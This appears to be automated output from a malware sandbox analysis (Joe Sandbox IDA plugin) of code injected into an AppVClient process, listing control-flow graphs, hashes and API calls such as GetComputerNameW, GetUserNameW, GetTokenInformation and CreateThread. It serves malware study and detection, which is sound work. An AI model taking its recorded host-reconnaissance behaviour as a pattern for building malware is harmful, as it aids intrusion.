                                                                                                                                                                      • Opcode ID: 24edfe86f89d863c459ef98baa66fa58558c940872ab27ebaee6b55c6d3c4fc8
                                                                                                                                                                      • Instruction ID: 62a600dcc4178c58a7e9bbd4a1ca1ef9aeebb4c8c88d6bcaac42d4d958bd671a
                                                                                                                                                                      • Opcode Fuzzy Hash: 24edfe86f89d863c459ef98baa66fa58558c940872ab27ebaee6b55c6d3c4fc8
                                                                                                                                                                      • Instruction Fuzzy Hash: 6011C23026EB928FD316DF38C489645BFE1EF063247594ADDC0868F1A3C36AA442CB17

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:98%
                                                                                                                                                                      Signature Coverage:3.9%
                                                                                                                                                                      Total number of Nodes:102
                                                                                                                                                                      Total number of Limit Nodes:7
                                                                                                                                                                      execution_graph 5699 b652b7 5700 b652b0 5699->5700 5703 b652c4 5699->5703 5701 b653c4 GetSystemDefaultLangID 5702 b65475 5701->5702 5703->5700 5703->5701 5710 b652f4 5712 b652cb 5710->5712 5711 b652b0 5712->5711 5713 b653c4 GetSystemDefaultLangID 5712->5713 5713->5711 5704 b68090 5706 b68075 5704->5706 5705 b68186 CloseHandle 5705->5706 5706->5705 5707 b680a7 5706->5707 5708 b680ca GetTokenInformation 5706->5708 5709 b681ad GetTokenInformation 5706->5709 5708->5706 5709->5706 5725 b657f0 5728 b655ac 5725->5728 5726 b655e4 5728->5725 5728->5726 5729 b83870 5728->5729 5730 b83876 5729->5730 5732 b83893 5730->5732 5733 b83720 5730->5733 5732->5728 5734 b70c42 5733->5734 5734->5733 5735 b6e050 VirtualAlloc 5734->5735 5736 b837dd 5734->5736 5735->5734 5736->5732 5736->5736 5693 b681b1 5697 b68075 5693->5697 5694 b68186 CloseHandle 5694->5697 5695 b681ad GetTokenInformation 5695->5697 5696 b680ca GetTokenInformation 5696->5697 5697->5694 5697->5695 5697->5696 5698 b680a7 5697->5698 5634 b65b87 CreateThread 5635 b65b1c 5634->5635 5643 b65810 5634->5643 5636 b65c20 5635->5636 5637 b65c01 CloseHandle 5635->5637 5638 b65cdf CreateThread 5635->5638 5640 b65d37 5637->5640 5638->5635 5638->5637 5641 b654a0 5638->5641 5642 b654b5 5641->5642 5644 b65822 5643->5644 5775 b65347 5779 b652cb 5775->5779 5776 b653c4 GetSystemDefaultLangID 5777 b65475 5776->5777 5778 b652b0 5779->5776 5779->5778 5650 b65b42 5652 b65b07 5650->5652 5652->5650 5655 b65bb4 5652->5655 5657 b65b68 5652->5657 5658 b652a0 5652->5658 5653 b65cdf CreateThread 5654 b65c01 CloseHandle 5653->5654 5653->5655 5662 b654a0 5653->5662 5654->5657 5655->5653 5655->5654 5655->5657 5661 b652ab 5658->5661 5659 b653c4 GetSystemDefaultLangID 5660 b652b0 5659->5660 5660->5652 5661->5659 5661->5660 5737 b65be2 5738 b65bfc CloseHandle 5737->5738 5740 b65be7 5737->5740 5738->5740 5663 b65b00 5664 b65bba 5663->5664 5671 b752c0 5664->5671 5666 b65bc7 5670 b65bde 5666->5670 5676 b80080 5666->5676 5670->5670 5672 b752c6 5671->5672 5673 b752ce 5671->5673 5672->5673 5690 b6e050 5672->5690 5673->5666 5677 b80089 5676->5677 5678 b803e0 GetComputerNameW 5677->5678 5679 b80181 VirtualFree 5677->5679 5680 b6e050 VirtualAlloc 5677->5680 5681 b803bf GetUserNameW 5677->5681 5682 b65c7b 5677->5682 5683 b804d6 GetComputerNameW 5677->5683 5678->5677 5679->5677 5680->5677 5681->5677 5684 b68070 5682->5684 5683->5677 5686 b68075 5684->5686 5685 b68186 CloseHandle 5685->5686 5686->5685 5687 b681ad GetTokenInformation 5686->5687 5688 b680ca GetTokenInformation 5686->5688 5689 b680a7 5686->5689 5687->5686 5688->5686 5689->5670 5691 b6e0c3 5690->5691 5692 b6e0d8 VirtualAlloc 5691->5692 5692->5691 5714 b65860 5715 b752c0 VirtualAlloc 5714->5715 5716 b65869 5715->5716 5717 b80080 5 API calls 5716->5717 5718 b6587d 5717->5718 5719 b68070 3 API calls 5718->5719 5720 b65870 5719->5720 5741 b655ef 5744 b655ac 5741->5744 5742 b83870 VirtualAlloc 5742->5744 5743 b655e4 5744->5742 5744->5743 5751 b65b09 5752 b65b16 5751->5752 5753 b65c20 5752->5753 5754 b65c01 CloseHandle 5752->5754 5755 b65cdf CreateThread 5752->5755 5757 b65d37 5754->5757 5755->5752 5755->5754 5758 b654a0 5755->5758 5757->5757

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00B652A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 306 b652a0-b653fe 311 ba0d4c-ba0d4e 306->311 312 b65400-b65424 306->312 314 b6542a 312->314 315 b6539b 312->315 314->315 316 b65430-b6543e 314->316 317 b65413-b65419 315->317 318 b6539d-b653a1 315->318 321 b65441-b6544a 316->321 319 b653a7 318->319 320 b652b0-b652b5 318->320 319->320 322 b653ad 319->322 327 b653c4-b653ca GetSystemDefaultLangID 321->327 328 b65450 321->328 323 b653f3-b653f9 322->323 324 b653af 322->324 334 b65355 323->334 335 b6532a 323->335 326 b653e0-b653f1 324->326 326->317 326->323 329 b65475-b6547b 327->329 336 b65411 328->336 337 b653c1 328->337 329->311 341 b652d1-b652e7 334->341 342 b652e8-b65363 334->342 335->334 338 b6532c-b6533f 335->338 336->317 336->327 337->336 340 b653c3 337->340 343 b6536b-b6536f 338->343 341->342 347 b65365 342->347 348 b653d1-b653d5 342->348 343->321 346 b65375-b65390 343->346 346->340 352 b65392-b6539a 346->352 347->348 351 b65367-b65369 347->351 348->318 350 b653d7 348->350 350->326 353 b65342-b65345 350->353 351->343 352->318 353->312 354 b6534b 353->354 354->312 355 b65351-b65353 354->355 355->334
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 00B653C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 9805ffbf04b2642cadfc8c284029357ac88f1d5d5b5fe3fc2da0b151244bfce2
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 2841E5A240DE958FD736432448A42707BD0EB227E2F9D01E7D4C78A3E6E59C0CB1972A
                                                                                                                                                                      Function 00B80080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 b80080-b80286 2 b80099-b80575 0->2 3 b8028c 0->3 7 b8057b 2->7 8 b80155 2->8 4 b80445 3->4 4->2 6 b8044b-b80457 4->6 10 b80458-b80472 GetComputerNameW 6->10 7->8 11 b80581-b80587 7->11 9 b802ef-b80495 call b6e050 * 2 8->9 9->10 52 b8043e 9->52 15 b8024c-b80253 10->15 16 b803ee-b803f4 10->16 13 b8058b 11->13 18 b8058c-b80591 13->18 19 b80181 VirtualFree 13->19 20 b80255 15->20 21 b801e6 15->21 40 b800da-b8023f 16->40 41 b803fa 16->41 24 b804ab-b804af 18->24 25 b80597 18->25 23 b801a8-b802ac call b97164 19->23 26 b802d3 20->26 29 b801ec-b80313 call b9715c 21->29 30 b802b1-b802be 21->30 23->30 49 b804c7 24->49 25->24 32 b8059d 25->32 26->21 39 b802d9 26->39 55 b80318-b8031e 29->55 36 b803bf-b803d9 GetUserNameW 30->36 37 b802c4 30->37 32->24 44 b80331 36->44 37->36 45 b802ca 37->45 39->9 40->15 53 b80241-b8024a 40->53 41->40 46 b80400 41->46 50 b80171 44->50 51 b80337 44->51 45->26 54 b8b1ee-b8b49f 46->54 58 b804cc-b804e6 call b99970 GetComputerNameW 49->58 59 b8013f-b80146 50->59 60 b80173 50->60 51->50 61 b8033d 51->61 52->4 53->15 53->30 56 b80568-b8056b 55->56 57 b80324 55->57 56->58 57->56 62 b8032a 57->62 69 b804ec-b80514 58->69 70 b80131 58->70 59->13 64 b80230 60->64 65 b805d0-b805d9 61->65 62->44 64->49 68 b80236-b805c2 64->68 65->54 68->49 72 b805c8-b805c9 68->72 69->56 73 b80089-b8008c 70->73 74 b80137 70->74 72->65 73->23 77 b80092 73->77 74->73 75 b8013d 74->75 75->19 75->59 77->23 78 b80098 77->78 78->2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction ID: eae33134d0fc381eaa36187e6219b49d6e3437180a0cb7e80f9b51d646616384
                                                                                                                                                                      • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                                                                                                                                                      • Instruction Fuzzy Hash: FBD10431568B0D8BC7A4FF58D8897EAB3E1FBA0350F18469EE846C3174DA749649C7C2
                                                                                                                                                                      Function 00B68070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 b68070-b6817e 81 b68180 79->81 82 b6813d-b681a5 79->82 83 b68184 81->83 84 b6815f 81->84 97 b681a7 82->97 98 b681bd-b681ca 82->98 85 b68186 CloseHandle 83->85 86 b6818c-b68192 83->86 84->82 88 b68161 84->88 85->86 90 b68194 86->90 91 b68115-b68118 86->91 89 b68163-b68170 call b97164 88->89 89->85 102 b68172 89->102 90->91 94 b6819a 90->94 95 b680a7 91->95 96 b68119-b6811a 91->96 100 b6813c 94->100 96->95 101 b6811c 96->101 105 b680f3 98->105 106 b681d0 98->106 100->83 103 b6820f 101->103 102->86 107 b68215-b6821e 103->107 108 b6808e-b68096 103->108 109 b680f5 105->109 110 b6808c 105->110 115 b680c3 106->115 116 b681fe-b68201 GetTokenInformation 106->116 107->108 118 b68224 107->118 108->83 108->95 109->110 117 b68077 109->117 110->108 115->116 121 b680c9 115->121 116->103 130 b681b7 116->130 120 b681d7-b681de call b9715c 117->120 119 b68226 118->119 118->120 119->120 123 b68228-b682ee call b65d90 119->123 128 b681e3-b681e6 120->128 126 b680ca-b680d8 GetTokenInformation 121->126 145 b682f0 123->145 146 b6830c-b6831e 123->146 129 b6810f 126->129 128->126 144 b68089 128->144 131 b68111 129->131 132 b6812d 129->132 130->103 135 b681b9-b681bb 130->135 131->132 137 b68113 131->137 139 b68133 132->139 140 b680a8 132->140 135->98 137->91 139->100 143 b681ed-b681f0 139->143 142 b680aa-b680ad 140->142 142->89 147 b680b3-b68203 142->147 148 b681f6 143->148 149 b680da-b680f1 143->149 144->126 150 b6808b 144->150 145->146 151 b682f2 145->151 154 b68320 146->154 155 b682a1-b682ba call b65d90 call b6ec00 146->155 147->89 158 b68209 147->158 148->149 153 b681fc 148->153 149->142 150->110 156 b682f7-b682fc call b65d90 151->156 153->116 154->156 157 b68322 154->157 155->154 169 b68302 156->169 170 b68253-b68265 call b81280 156->170 157->156 161 b68324-b68326 157->161 164 b68328 161->164 172 b68335 164->172 173 b682df-b6832b 164->173 169->170 175 b68308-b6830a 169->175 170->164 180 b6826b 170->180 178 b6826e-b68285 172->178 173->172 179 b6832d-b68331 173->179 175->146 181 b68287 178->181 182 b6829b-b6829d 178->182 179->172 180->178 183 b68239 180->183 184 b6824c 181->184 182->155 183->164 185 b6823f-b68243 183->185 184->182 186 b6824e-b68252 184->186 185->156 185->184 186->178
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction ID: b6f8a60212a43e3ca5ac16d149e307f47120f5f188d68b34a7f1b0ebfd8a7ec0
                                                                                                                                                                      • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                                                                                                                                                      • Instruction Fuzzy Hash: E9614B7050CA459FCB658B2888A47357BE0FB5A350F640BDAE44BD31A1DF3C9C49D752
                                                                                                                                                                      Function 00B65B09 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 b65b09-b65b3b 191 b65cff-b65d01 187->191 192 b65d07 191->192 193 b65bb4 191->193 192->193 194 b65d0d 192->194 195 b65c01-b65d41 CloseHandle 193->195 196 b65cda-b65ce4 CreateThread 193->196 202 b65d43 195->202 203 b65d4b-b65d52 195->203 196->195 199 b65cea 196->199 199->195 201 b65cf0-b65cf6 199->201 201->191 204 b65c20-b65c68 201->204 205 b65d54 202->205 203->205 206 b65d45-b65d47 203->206 207 b65d5f 206->207 208 b65d49 206->208 210 b65d65 207->210 208->203 208->207 210->210
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 2470f97aee313f71d9ac5824af60f86f9477d10455a8160754673fc98f110ff2
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F01923010DF468FDB755B248C987797BD0EB55324F2901EB8487CA0D1DEAD4920E712
                                                                                                                                                                      Function 00B65910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 211 b65910-b65912 212 b65915-b65928 call b99970 211->212 213 b65950-b65968 211->213 219 b659b8 call b80df0 212->219 213->212 214 b6596a 213->214 216 b65970-b6597b 214->216 217 b6592f 214->217 220 b659d4 216->220 221 b6597d 216->221 217->212 222 b65931-b7072c 217->222 230 b659bd-b659c2 call b65d90 219->230 225 b6593b-b65a15 call b811a0 220->225 226 b659d8-b659de 220->226 221->220 223 b6597f-b65981 221->223 231 b70806-b70809 222->231 232 b70732-b70738 222->232 228 b65983-b65a38 223->228 241 b65994-b6599c 226->241 243 b659e0 226->243 228->241 242 b65a3e 228->242 245 b659c7-b659ce 230->245 246 b7079d-b707a6 231->246 238 b70800 232->238 239 b7073e 232->239 238->231 244 b706b3-b706b7 238->244 239->238 247 b70744-b70774 239->247 256 b65a02 241->256 257 b6599e-b659f7 241->257 252 b65a2c-b65a34 242->252 243->241 249 b659e2-b659ec 243->249 244->246 248 b706bd 244->248 253 b659d0 245->253 254 b65a1a-b65a26 245->254 250 b70791-b70793 246->250 251 b707a8 246->251 267 b706d5-b706d9 247->267 268 b7077a-b7081c 247->268 248->246 259 b706c3-b707fe 248->259 261 b65a62-b65a6e 249->261 262 b659ee-b659ef 249->262 260 b707ca-b707cc 250->260 251->250 263 b707aa 251->263 264 b659d9-b659de call b92190 252->264 253->254 266 b659d2 253->266 254->252 265 b659a1-b659b5 call b65e10 254->265 256->216 257->256 259->238 275 b65a75-b65ab3 call b81280 261->275 276 b65a70 261->276 262->228 272 b659f1 262->272 263->260 264->241 264->243 265->219 284 b65a08-b65a0b 265->284 266->264 273 b706df 267->273 274 b706db 267->274 268->246 272->212 273->246 274->273 279 b706dd 274->279 299 b65ab5 275->299 300 b65abb-b65af2 275->300 276->275 280 b65a72 276->280 279->273 285 b7c0cc 279->285 280->275 284->241 287 b65a0d 284->287 289 b7c0ce-b7c0d0 285->289 290 b7c0e8-b7c102 285->290 296 b65932 287->296 297 b65991 287->297 292 b7c0d2-b7c0df 289->292 291 b7c104 290->291 290->292 291->292 303 b7c0e7 291->303 292->303 297->296 302 b65993 297->302 299->300 304 b65ab7-b65ab9 299->304 305 b65af3 300->305 302->241 304->300 305->305
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 379edc350b9d0129ca745cdca3f70a5a094096eee9ffbcaa618440fd7433c1c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: AFF1F82171DE488FC669B72C58916B977D2FB99310F5846DFE09FC32A6DD289C06C382
                                                                                                                                                                      Function 00B65B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 356 b65b42-b65b47 call b65d90 358 b65b4c-b65b52 356->358 360 b65c42-b65c62 call b81280 358->360 361 b65b0d 358->361 372 b65c24 360->372 373 b65c68 360->373 361->360 362 b65b13 361->362 364 b65c8f-b65c96 362->364 366 b65c98-b65c9a 364->366 367 b65c29 364->367 368 b65c9c 366->368 369 b65cc2-b65cc9 call b652a0 367->369 370 b65c2f-b65c36 367->370 377 b65d0e-b65d18 368->377 378 b65bfa 368->378 388 b65ccb 369->388 389 b65c69 369->389 370->369 376 b65c3c 370->376 379 b65c26 372->379 380 b65c14-b65c19 372->380 376->356 382 b65d54 377->382 383 b65d1a 377->383 378->377 384 b65c00 378->384 379->380 387 b65c28 379->387 385 b65cc0 380->385 386 b65c20-b65c21 380->386 392 b65d4b-b65d52 383->392 384->380 385->369 386->373 387->367 388->368 393 b65ccd 388->393 390 b65c6f 389->390 391 b65b68-b65d75 389->391 390->391 394 b65c75 390->394 392->382 395 b65d45-b65d47 392->395 393->368 396 b65ccf-b65cdd 393->396 394->364 398 b65d5f 395->398 399 b65d49 395->399 400 b65cdf-b65ce4 CreateThread 396->400 405 b65d65 398->405 399->392 399->398 401 b65c01-b65c05 CloseHandle 400->401 402 b65cea 400->402 407 b65d37-b65d41 401->407 402->401 403 b65cf0-b65cf6 402->403 403->386 406 b65cff-b65d01 403->406 405->405 408 b65d07 406->408 409 b65bb4 406->409 407->392 410 b65d43 407->410 408->409 411 b65d0d 408->411 409->401 412 b65cda-b65cdd 409->412 410->382 412->400
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: fb12567052542f99b70d32704541f275c001d25d8e27eb0aa47124da14fed7be
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4421AF3120CF458FCB7A9B1888A8B746AE1EB55350F6C05F69447CF1E2CA2CDC649766
                                                                                                                                                                      Function 00B65B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 413 b65b87-b65b99 CreateThread 416 b65cff-b65d01 413->416 417 b65d07 416->417 418 b65bb4 416->418 417->418 419 b65d0d 417->419 420 b65c01-b65c05 CloseHandle 418->420 421 b65cda-b65ce4 CreateThread 418->421 425 b65d37-b65d41 420->425 421->420 424 b65cea 421->424 424->420 426 b65cf0-b65cf6 424->426 427 b65d43 425->427 428 b65d4b-b65d52 425->428 426->416 429 b65c20-b65c68 426->429 430 b65d54 427->430 428->430 431 b65d45-b65d47 428->431 432 b65d5f 431->432 433 b65d49 431->433 435 b65d65 432->435 433->428 433->432 435->435
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: 59be04fab525041c89196beefdb59a0da8c1fe46af5b1595692bf82ee1c14227
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: B7E08C3060DF488FDB7A9F249D603293AE5EB88310F1902DFC48ADB1D1DF6D09168B82
                                                                                                                                                                      Function 00B6599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 436 b6599b-b6599e 437 b659f7 436->437 438 b65a02 437->438 440 b659d4 438->440 441 b6597d 438->441 443 b6593b-b65a15 call b811a0 440->443 444 b659d8-b659de 440->444 441->440 442 b6597f-b65981 441->442 445 b65983-b65a38 442->445 451 b65994-b6599c 444->451 453 b659e0 444->453 445->451 452 b65a3e 445->452 451->438 456 b6599e 451->456 455 b65a2c-b65a34 452->455 453->451 454 b659e2-b659ec 453->454 457 b65a62-b65a6e 454->457 458 b659ee-b659ef 454->458 459 b659d9-b659de call b92190 455->459 456->437 461 b65a75-b65ab3 call b81280 457->461 462 b65a70 457->462 458->445 460 b659f1 call b99970 458->460 459->451 459->453 472 b659b8 call b80df0 460->472 475 b65ab5 461->475 476 b65abb-b65af2 461->476 462->461 465 b65a72 462->465 465->461 478 b659bd-b659c2 call b65d90 472->478 475->476 479 b65ab7-b65ab9 475->479 481 b65af3 476->481 482 b659c7-b659ce 478->482 479->476 481->481 483 b659d0 482->483 484 b65a1a-b65a26 482->484 483->484 486 b659d2 483->486 484->455 485 b659a1-b659b5 call b65e10 484->485 485->472 489 b65a08-b65a0b 485->489 486->459 489->451 490 b65a0d 489->490 492 b65932 490->492 493 b65991 490->493 493->492 494 b65993 493->494 494->451
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 977950c3797f21623c7fa84dcc284c5ab353265b0a03b45339df85e43af3c3da
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: FD01F97091EE84CFD77BEB58448227966D2F758320F2C06EA90CAC70D2C83C4D349B41
                                                                                                                                                                      Function 00B65BE2 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 495 b65be2-b65be5 496 b65be7-b65ca3 495->496 497 b65bfc-b65c05 CloseHandle 495->497 501 b65ca5 496->501 502 b65ca8-b65cb3 call b65e10 496->502 503 b65d37-b65d41 497->503 501->502 505 b65ca7 501->505 511 b65d26 502->511 512 b65cb5 502->512 507 b65d43 503->507 508 b65d4b-b65d52 503->508 505->503 509 b65d54 507->509 508->509 510 b65d45-b65d47 508->510 513 b65d5f 510->513 514 b65d49 510->514 516 b65d27-b65d2a call b65910 511->516 512->511 515 b65cb7 512->515 520 b65d65 513->520 514->508 514->513 517 b65d5b-b65d5d 515->517 521 b65d2e 516->521 517->513 520->520 521->517
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                                                                                                                                                      • Instruction ID: 8621be7e525d3fb6e797c8f9baab12645f45a1e46ec4bdfc7855cb8966be2d73
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 01E01231558E1ADFEA74AA18CD99E7526C0D724361F2805F18806CB150E55CDA756612
                                                                                                                                                                      Function 00B68090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
